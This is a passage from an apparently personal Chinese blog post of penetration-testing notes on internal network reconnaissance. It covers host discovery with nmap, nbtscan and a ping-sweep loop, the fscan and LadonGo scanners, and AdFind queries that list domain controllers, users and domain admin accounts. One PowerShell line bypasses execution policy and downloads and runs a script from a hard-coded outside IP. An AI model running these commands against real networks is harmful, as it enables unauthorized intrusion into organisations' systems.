<figure class="highlight tap"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs tap">端口：<span class="hljs-number"> 53 </span>  DNS服务器开放<br>端口：<span class="hljs-number"> 389 </span> 轻型目录访问协议<br></code></pre></td></tr></table></figure>

<p>个人推荐</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ada">ipconfig /<span class="hljs-keyword">all</span> <br>setspn <br></code></pre></td></tr></table></figure>



<h2 id="内网存活探测"><a href="#内网存活探测" class="headerlink" title="内网存活探测"></a>内网存活探测</h2><p>windows  445端口  存活探测</p>
<p>linux 22 端口</p>
<p>最好扫描16 的子网掩码，因为有可能存在其他网段的情况</p>
<h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap扫描</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">nmap</span> -sU -T4 --script nbstat.nse -p137 <span class="hljs-number">10.10.10.0</span>/<span class="hljs-number">24</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>-sU:扫描udp端口</p>
<p>-T4:指定扫描的速度</p>
<p>–script:指的是指定脚本</p>
<p>-p137:指定的端口（文件共享端口）</p>
</blockquote>
<h3 id="msf扫描"><a href="#msf扫描" class="headerlink" title="msf扫描"></a>msf扫描</h3><p><img src="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240109165748478.png" srcset="/img/loading.gif" lazyload alt="image-20240109165748478"></p>
<p>由于kali 不和那些是一个网段，所以用不了，反映了显示状态下kali的局限性，替代方式是vps</p>
<h3 id="nbtscan"><a href="#nbtscan" class="headerlink" title="nbtscan"></a>nbtscan</h3><p><img src="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240109170056352.png" srcset="/img/loading.gif" lazyload alt="image-20240109170056352"></p>
<p><img src="https://raw.githubusercontent.com/august244/picture/master/allinit/%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240109170225885.png" srcset="/img/loading.gif" lazyload alt="image-20240109170225885"></p>
<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-symbol">linux:</span>  nbtscan -r <span class="hljs-built_in">ip</span>段<br></code></pre></td></tr></table></figure>



<h3 id="icmp协议"><a href="#icmp协议" class="headerlink" title="icmp协议"></a>icmp协议</h3><p>nmap会使用ping 做存活探测</p>
<blockquote>
<p>  @for &#x2F;l %i in  (1,1,255) do @ping -n 1 -w  40 10.10.10.%i &amp; if errorlevel 1 (echo  10.10.10.%i&gt;&gt;c:\a.txt) else (e  cho 10.10.10.%i &gt;&gt;c:\b.txt)  </p>
</blockquote>
<h3 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h3><p>本质是icmp</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs powershell">powershell.exe <span class="hljs-literal">-exec</span> bypass <span class="hljs-literal">-Command</span> <span class="hljs-string">&quot;Import-Module ./Invoke-TSPingSweep.ps1; Invoke-TSPingSweep -StartAddress</span><br><span class="hljs-string">192.168.1.1 -EndAddress 192.168.1.254 -ResolveHost -ScanPort -Port 445,135&quot;</span><br>powershell <span class="hljs-built_in">iex</span>(<span class="hljs-built_in">new-object</span> net.webclient).downloadstring(<span class="hljs-string">&#x27;http://47.104.255.11:8000/Invoke-TSPingSweep.ps1&#x27;</span>);<span class="hljs-keyword">In</span><br>voke<span class="hljs-literal">-TSPingSweep</span> <span class="hljs-literal">-StartAddress</span> <span class="hljs-number">10.10</span>.<span class="hljs-number">10.1</span> <span class="hljs-literal">-EndAddress</span> <span class="hljs-number">10.10</span>.<span class="hljs-number">10.254</span> <span class="hljs-literal">-ResolveHost</span> <span class="hljs-literal">-ScanPort</span> <span class="hljs-literal">-Port</span> <span class="hljs-number">445</span>,<span class="hljs-number">135</span><br><br></code></pre></td></tr></table></figure>



<h2 id="内网信息收集工具"><a href="#内网信息收集工具" class="headerlink" title="内网信息收集工具"></a>内网信息收集工具</h2><h3 id="fscan"><a href="#fscan" class="headerlink" title="fscan"></a>fscan</h3><ol>
<li><p>简介</p>
<p>内网综合扫描工具，方便一键自动化，全方位漏洞扫描器</p>
<blockquote>
<p>  项目地址：<a target="_blank" rel="noopener" href="https://github.com/shadow1ng/fscan">https://github.com/shadow1ng/fscan</a>  </p>
</blockquote>
</li>
<li><p>探测存活</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">fscan.exe -h 192.168.1.1/24 (默认使用全部模块)<br>fscan.exe -h 192.168.1.1/16 (B段扫描)<br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="LadonGo"><a href="#LadonGo" class="headerlink" title="LadonGo"></a>LadonGo</h3><p>LadonGO 4.2 Pentest Scanner framework 全平台Go开源内网渗透扫描器框架</p>
<p>但是这个需要自己编译一下</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs go"><span class="hljs-keyword">go</span> build <br></code></pre></td></tr></table></figure>

<p>具体也可以参照github</p>
<h3 id="Adfind"><a href="#Adfind" class="headerlink" title="Adfind"></a>Adfind</h3><p>这个是在cs里面存在的</p>
<figure class="highlight prolog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs prolog"><span class="hljs-symbol">Usage</span>:<br> <span class="hljs-symbol">AdFind</span> [switches] [-b basedn] [-f filter] [attr list]<br><br>   basedn        <span class="hljs-symbol">RFC</span> <span class="hljs-number">2253</span> <span class="hljs-symbol">DN</span> to base search from. <span class="hljs-symbol">If</span> no base specified, defaults to default <span class="hljs-symbol">NC</span>.<br>                 <span class="hljs-symbol">Base</span> <span class="hljs-symbol">DN</span> can also be specified as a <span class="hljs-symbol">SID</span>, <span class="hljs-symbol">GUID</span>, or <span class="hljs-symbol">IID</span>.<br>   filter        <span class="hljs-symbol">RFC</span> <span class="hljs-number">2254</span> <span class="hljs-symbol">LDAP</span> filter. <span class="hljs-symbol">If</span> no filter specified, defaults to objectclass=*.<br>   attr list     <span class="hljs-symbol">List</span> of specific attributes to return, <br>                 if nothing specified returns <span class="hljs-string">&#x27;default&#x27;</span> attributes, aka * set.<br><br>  <span class="hljs-symbol">Switches</span>: (designated by - or /)<br><br>    [<span class="hljs-symbol">CONNECTION</span> <span class="hljs-symbol">OPTIONS</span>][连接选项]<br>   -h host:port  要使用的主机和端口。如果未指定，则使用默认<span class="hljs-symbol">LDAP</span>服务器上的端口<span class="hljs-number">389</span>。<br>                 <span class="hljs-symbol">Localhost</span>可以指定为“.”; 还可以通过-p和-gc指定端口。<br>                 指定了带端口的<span class="hljs-symbol">IPv6</span> [address]:port<br>   -gc           搜索全局目录 (port <span class="hljs-number">3268</span>)。<br>   -p port       指定要连接到的端口的备用方法。<br><br>    [<span class="hljs-symbol">QUERY</span> <span class="hljs-symbol">OPTIONS</span>][查询选项]<br>   -s scope      搜索范围。 <span class="hljs-symbol">Base</span>, <span class="hljs-symbol">One</span>[<span class="hljs-symbol">Level</span>], <span class="hljs-symbol">Sub</span>[tree].<br>   -t xxx        查询的超时值，默认为<span class="hljs-number">120</span>秒。<br><br>    [<span class="hljs-symbol">OUTPUT</span> <span class="hljs-symbol">OPTIONS</span>][输出选项]<br>   -c            仅对象计数。<br>   -dn           仅对象<span class="hljs-symbol">DN</span>。<br>   -appver       输出<span class="hljs-symbol">AdFind</span>版本信息。<br></code></pre></td></tr></table></figure>

<p>查看域控的名称</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">adfind -sc dclist</span><br></code></pre></td></tr></table></figure>

<p>查看域控的版本</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"><span class="hljs-comment">#列出域控制器名称</span><br>AdFind -<span class="hljs-keyword">sc </span>dclist<br><br><span class="hljs-comment">#查看域控版本</span><br>AdFind -<span class="hljs-keyword">schema </span>-s <span class="hljs-keyword">base </span>objectversion<br><br><span class="hljs-comment">#查询当前域中在线的计算机(所有属性)</span><br>AdFind -<span class="hljs-keyword">sc </span>computers_active<br><br><span class="hljs-comment">#查询当前域中在线的计算机(只显示名称和操作系统)</span><br>AdFind -<span class="hljs-keyword">sc </span>computers_active name operatingSystem<br><br><span class="hljs-comment">#查询当前域中所有计算机(所有属性)</span><br>AdFind -f <span class="hljs-string">&quot;objectcategory=computer&quot;</span><br><br><span class="hljs-comment">#查询当前域中所有计算机(只显示名称和操作系统)</span><br>AdFind -f <span class="hljs-string">&quot;objectcategory=computer&quot;</span> name operatingSystem<br><br><span class="hljs-comment">#查询指定域(mingy.local)中所有计算机(所有属性)</span><br>Adfind -<span class="hljs-keyword">b </span>dc=mingy,dc=local -f <span class="hljs-string">&quot;objectcategory=computer&quot;</span><br><br><span class="hljs-comment">#查询域内所有用户</span><br>AdFind -users name<br><br><span class="hljs-comment">#查询指定域(mingy.local)内所有用户(所有属性)</span><br>Adfind -<span class="hljs-keyword">b </span>dc=mingy,dc=local -f <span class="hljs-string">&quot;objectcategory=user&quot;</span><br><br><span class="hljs-comment">#查询所有GPO信息</span><br>AdFind -<span class="hljs-keyword">sc </span>gpodmp<br><br><span class="hljs-comment">#查看受保护AD域账户</span><br>Adfind -f <span class="hljs-string">&quot;&amp;(objectcategory=person)(samaccountname=*)(admincount=1)&quot;</span> -dn<br><br><span class="hljs-comment">#查看域管账户</span><br>AdFind -default -f <span class="hljs-string">&quot;(&amp;(|(&amp;(objectCategory=person)(objectClass=user))(objectCategory=group))(adminCount=1))&quot;</span> -dn<br></code></pre></td></tr></table></figure>



<h2 id="BloodHound"><a href="#BloodHound" class="headerlink" title="BloodHound"></a>BloodHound</h2><p>大型域常用的工具</p>
<p>直接在kali 上面运行就行了</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%B8%97%E9%80%8F/">#渗透</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>内网信息搜集</div>
      <div>https://tsy244.github.io/2023/09/12/渗透/内网信息收集/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>August Rosenberg</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>September 12, 2023</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/09/21/web/WEB%E5%AE%89%E5%85%A8/" title="WEB安全">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">WEB安全</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/09/10/CTF%E6%AF%94%E8%B5%9B%E8%AE%B0%E5%BD%95/moectf2023/" title="moectf2023">
                        <span class="hidden-mobile">moectf2023</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://github.com/TSY244?tab=repositories" target="_blank" rel="nofollow noopener"><span>github</span></a> <i class="iconfont icon-love"></i> <a href="https://august244.github.io/" target="_blank" rel="nofollow noopener"><span>随笔</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        Views: 
        <span id="busuanzi_value_site_pv"></span>
        
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        Visitors: 
        <span id="busuanzi_value_site_uv"></span>
        
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
